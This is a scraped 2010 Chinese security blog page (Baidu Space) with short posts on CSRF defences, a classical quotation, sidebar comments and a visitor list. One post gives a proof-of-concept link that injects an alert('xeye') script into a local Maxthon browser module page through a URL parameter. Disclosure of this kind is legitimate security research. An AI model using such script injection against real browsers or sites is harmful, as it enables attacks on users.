梦之光芒_百度空间
百度空间 | 百度首页 
 
光芒消息
 
 
 
     
 
文章列表
 
2010-03-09 17:12

poc:
<a href="file:///E:/program files/Maxthon2/Modules/MxKWS/webui/kwebshield/replace.htm#state=0&url=http://www.39516.com/<script>alert('xeye')</script>">xeye</a>

访问一个站点时出现了这一片红,所以顺便插了点东西,纯属意外!

 
2010-03-09 02:05

阿尔卑斯糖很好吃!

Monyer!

 
2010-03-08 12:56

君子曰:学不可以已。

青,取之于蓝,而青于蓝;冰,水为之,而寒于水。木直中绳,輮以为轮,其曲中规,虽有槁暴,不复挺者,輮使之然也。故木受绳则直,金就砺则利,君子博学而日参省乎己,则知明而行无过矣。故不登高山,不知天之高也;不临深溪,不知地之厚也;不闻先王之遗言,不知学问之大也。干、越、夷、貉之子,生而同声,长而异俗,教使之然也。诗曰:「嗟尔君

 
2010-03-05 11:55

昨天luoluo牛的留言被robot ban掉了,所以这里再贴一下:

顶,很巧妙的想法,但是没法100%保证不被攻击,这个方法的安全性依赖于cookie的失效时间,假设有个csrf页面里死循环不停提交的话,如果被攻击用户打开这个页面没有关闭,这个过程中如果用户又去被攻击的网站作一次正常操作的话,攻击就有一定的概率成功了,比如以下代码在ff中就有一定的概率成功(ie不行,因为iframe跨域提交cookie被阻止了):

 
2010-03-04 20:39


我们知道,一般防御CSRF有三种方法,判断referer验证码token

对于判断referer来说,虽然客户端带用户状态的跨域提交,js和as已经无法伪造referer了;但是对于客户端软件和flash的提交,一般是不带referer的,据说一些山寨浏览器也不带。那么就需要为此开绿灯,但这样使得外站的flash请求伪造无

 
     
 
 
个人档案
 
monyer
男, 23岁
北京 海淀区 
上次登录:
18小时前
加为好友
 
   
 
文章分类
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
Whim(1)
 
 
     
 
背景音乐
 
 
光芒圈子
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     
 
最新评论
 
文章评论|照片评论


楼上什么意思?
 

这种漏洞还未普及。。
 
 

挺。 邪恶。
 

布置得很能吸引MM啊,哈哈
 
这一张是天堂 上几张是人间炼狱吗 她在为他们祈祷吗
 
好心酸的照片 多可爱的孩子啊
 
太羡慕了,我喜欢这么惬意的享受阳光的生活,
 
发信息给你的人很无聊吧
 
好多插件啊!
 
     
 
留言板
 

真是人心不古。
 

情海欲天,相遇是缘 情海欲天,相遇是缘 情海欲天,相遇是缘
 

有幸进入高手空间,收获良多!
 

来支持你了,也希望同样支持我,谢谢!
 

自考历史上最好考的专业,一年就可以通过,专业课只有50分,没有数学,跨专业无需加考...
 
     
 
最近访客
 
 

li5211218

wudi128

csshaier

hysia

Gne3

i2086

xiangyue1998

々河东飞虎々
     
 
 
光芒视角
 
 
 
 
 
 
 
 
 
     
 
光芒之友
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
     


©2010 Baidu